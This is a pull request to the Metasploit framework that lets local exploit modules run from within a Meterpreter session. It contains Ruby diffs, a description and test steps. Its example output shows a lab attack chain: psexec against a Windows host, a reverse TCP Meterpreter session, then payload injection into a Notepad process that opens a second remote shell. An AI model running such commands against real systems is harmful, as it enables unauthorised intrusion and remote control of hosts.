### PR TITLE
Allow running local exploits in Meterpreter

### DIFF
--- a/lib/msf/base/simple/exploit.rb
+++ b/lib/msf/base/simple/exploit.rb
@@ -68,6 +68,12 @@ module Exploit
       exploit._import_extra_options(opts)
       opts['Payload'] ||= exploit.datastore['Payload']
 
+      unless opts['Quiet']
+        exploit.init_ui(opts['LocalInput'] || exploit.user_input, opts['LocalOutput'] || exploit.user_output)
+      else
+        exploit.init_ui(nil, nil)
+      end
+
       # Make sure parameters are valid.
       if (opts['Payload'] == nil)
         raise MissingPayloadError, 'A payload has not been selected.', caller
@@ -125,11 +131,9 @@ module Exploit
       driver.target_idx = target_idx
 
       # Set the payload and exploit's subscriber values
-      if ! opts['Quiet']
-        driver.exploit.init_ui(opts['LocalInput'] || exploit.user_input, opts['LocalOutput'] || exploit.user_output)
+      unless opts['Quiet']
         driver.payload.init_ui(opts['LocalInput'] || exploit.user_input, opts['LocalOutput'] || exploit.user_output)
       else
-        driver.exploit.init_ui(nil, nil)
         driver.payload.init_ui(nil, nil)
       end
 

--- a/lib/msf/base/simple/exploit.rb
+++ b/lib/msf/base/simple/exploit.rb
@@ -66,6 +66,7 @@ module Exploit
 
       # Import options from the OptionStr or Option hash.
       exploit._import_extra_options(opts)
+      opts['Payload'] ||= exploit.datastore['Payload']
 
       # Make sure parameters are valid.
       if (opts['Payload'] == nil)
@@ -78,8 +79,8 @@ module Exploit
       # Start it up
       driver = ExploitDriver.new(exploit.framework)
 
-      # Keep the handler of driver running if exploit multi targets.
-      driver.keep_handler = true if opts["multi"]
+      # Keep the handler of driver running if exploiting multiple targets.
+      driver.keep_handler = true if opts['multi']
 
       # Initialize the driver instance
       driver.exploit    = exploit

--- a/lib/msf/core/exploit/local.rb
+++ b/lib/msf/core/exploit/local.rb
@@ -21,6 +21,6 @@ class Msf::Exploit::Local < Msf::Exploit
   end
 
   def run_simple(opts = {}, &block)
-    raise NotImplementedError, ' - This way of running the local exploit is currently not supported.'
+    Msf::Simple::Exploit.exploit_simple(self, opts, &block)
   end
 end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -1443,7 +1443,13 @@ class Console::CommandDispatcher::Core
           return
         end
 
-        opts = (args + [ "SESSION=#{client.sid}" ]).join(',')
+        opts = ''
+        if reloaded_mod.is_a?(Msf::Exploit)
+          # set the payload as one of the first options, allowing it to be overridden by the user
+          opts << "PAYLOAD=#{client.via_payload.delete_prefix('payload/')}," if client.via_payload
+        end
+
+        opts  << (args + [ "SESSION=#{client.sid}" ]).join(',')
         result = reloaded_mod.run_simple(
           #'RunAsJob' => true,
           'LocalInput'  => shell.input,

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -1444,12 +1444,14 @@ class Console::CommandDispatcher::Core
         end
 
         opts = (args + [ "SESSION=#{client.sid}" ]).join(',')
-        reloaded_mod.run_simple(
+        result = reloaded_mod.run_simple(
           #'RunAsJob' => true,
           'LocalInput'  => shell.input,
           'LocalOutput' => shell.output,
           'OptionStr'   => opts
         )
+
+        print_status("Session #{result.sid} created in the background.") if result.is_a?(Msf::Session)
       else
         # the rest of the arguments get passed in through the binding
         client.execute_script(script_name, args)


### PR DESCRIPTION
This updates Metasploit to allow local exploits to be run within the context of Meterpreter like post modules can be. This functions by implementing the `Msf::Exploit::Local#run_simple` method which defers to `Msf::Simple::Exploit.exploit_simple` which was tweaked. I'll leave comments in the code near the relevant sections on why I made the changes I did. One of the benefits of this is to be able to script out running local exploits using the `AutoRunScript` option.

For convenience, the `PAYLOAD` option will be taken from the current session (when available) so if the user wants to use the same once which presumably works since they're using it, they just need to specify its required options like `LHOST`.

New sessions are left in the background. This makes it easier since Metasploit doesn't have to deal with context switching. I also added tab completion in 2b1d7f1 so post modules and local exploits will be suggested. This slows things down considerably so if we'd prefer to remove it, that's fine too.

## Example Output

```
msf6 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.33:445 - Connecting to the server...
[*] 192.168.159.33:445 - Authenticating to 192.168.159.33:445 as user 'smcintyre'...
[*] 192.168.159.33:445 - Selecting PowerShell target
[*] 192.168.159.33:445 - Executing the payload...
[+] 192.168.159.33:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200262 bytes) to 192.168.159.33
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.33:49253) at 2020-12-01 18:10:22 -0500

meterpreter > run exploit/windows/local/payload_inject LHOST=192.168.159.128

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running module against WIN-9NSI4A6AIHJ
[*] Spawned Notepad process 3228
[*] Injecting payload into 3228
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 3228
[*] Sending stage (200262 bytes) to 192.168.159.33
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.33:49254) at 2020-12-01 18:10:35 -0500
[*] Session 2 created in the background.
meterpreter >
```

## Testing

- [ ] Obtain a meterpreter session using a reverse* payload
- [ ] Run a local exploit module with no options (e.g. `run exploit/windows/local/payload_inject`)
    - [ ] See an error message stating that LHOST was not set
- [ ] Run a local exploit module, setting LHOST (e.g. `run exploit/windows/local/payload_inject LHOST=1.2.3.4`)
     - [ ] See that a new session was created in the background